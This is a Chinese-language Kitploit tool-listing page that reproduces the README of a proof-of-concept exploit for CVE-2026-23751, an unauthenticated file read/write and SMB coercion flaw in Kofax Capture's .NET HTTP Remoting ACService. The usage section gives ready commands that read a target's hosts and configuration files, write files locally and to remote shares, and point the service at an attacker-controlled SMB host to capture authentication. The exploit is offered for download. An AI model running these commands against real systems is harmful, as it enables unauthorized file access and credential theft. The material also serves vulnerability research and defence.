Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23751-poc — 已修补 RemotingClient 以利用 CVE-2026-23751(Tungsten Automation - Kofax Capture 通过 .NET HTTP Remoting 实现未认证文件读取/写入及 SMB 强制认证) | Kitploit
工具/GitHubGitHub/siebrum/cve-2026-23751-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

已修补 RemotingClient 以利用 CVE-2026-23751(Tungsten Automation - Kofax Capture 通过 .NET HTTP Remoting 实现未认证文件读取/写入及 SMB 强制认证)

查看仓库
6小时39分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23751-poc

对 Code White 的 NewRemotingTricks 中所述技术的概念验证重新实现,针对 Tungsten Automation Kofax Capture。

CVE-2026-23751

标题: Tungsten Automation - Kofax Capture 通过 .NET HTTP Remoting 实现未认证文件读取/写入及 SMB 强制认证

CVE: CVE-2026-23751

描述

CVE-2026-23751 影响 Tungsten Automation Kofax Capture,允许未认证的远程攻击者与 Kofax Capture ACService 暴露的 .NET HTTP Remoting 端点进行交互。

该漏洞可被利用来执行:

  • 未认证的任意文件读取
  • 未认证的任意文件写入
  • SMB 认证强制
  • 访问 Kofax Capture 服务可访问的本地文件
  • 通过 UNC 路径访问远程文件

该 PoC 重新实现了 Code White 的 NewRemotingTricks 项目中相关的 .NET Remoting 技术。

受影响的端点

该 PoC 针对 Kofax Capture ACService HTTP Remoting 端点:

root@kitploit:~
http://<target>:2424/ACService

端口 2424 是受影响服务使用的默认 HTTP Remoting 端口。

使用方法

读取本地文件

以下示例从目标读取 Windows hosts 文件:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

同样可以读取 Kofax Capture 配置文件:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

写入本地文件

通过提供目标路径及内容,可以将文件写入 Kofax Capture 服务可访问的位置:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

写入远程 SMB 共享

同样的功能可以与 UNC 路径一起使用,以写入远程 SMB 共享:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

访问远程资源的能力取决于 Kofax Capture 服务的权限和安全上下文。

SMB 强制认证

可以提供 file:// URI 以导致目标访问远程 SMB 资源:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

根据目标环境及其安全配置,这可能导致受影响主机向攻击者控制的 SMB 服务器进行认证。

技术背景

该漏洞涉及 Kofax Capture 的 ACService 使用 .NET HTTP Remoting。

.NET Remoting 支持各种 URI 方案和对象序列化机制。通过以特定方式与暴露的 remoting 端点交互,未认证客户端可以导致服务使用客户端提供的路径执行文件系统操作。

该 PoC 演示了如何利用此行为来:

  • 检索本地文件
  • 将数据写入本地文件
  • 访问远程 UNC/SMB 路径
  • 触发对远程 file:// 资源的访问

该 PoC 目前演示了将字符串数据写入文件。通过相应修改源代码,可以支持其他文件类型和负载格式。

此实现基于以下研究中提出的技术和成果:

Code White - NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

要求

  • Windows
  • 可访问目标 Kofax Capture ACService 的网络
  • 暴露受影响 HTTP Remoting 端点的 Kofax Capture 实例
  • RemotingClient_MBRO_Lazy.exe

利用该漏洞无需对 Kofax Capture 服务进行认证。

免责声明

本仓库仅用于安全研究、漏洞验证和授权渗透测试目的。

未经明确授权,请勿将此 PoC 用于任何系统。作者不对因滥用本软件而导致的损害、数据丢失、未经授权的访问或其他后果负责。

参考

  • CVE-2026-23751 — Tungsten Automation Kofax Capture 通过 .NET HTTP Remoting 实现未认证文件读取/写入及 SMB 强制认证
  • Code White - NewRemotingTricks
下载工具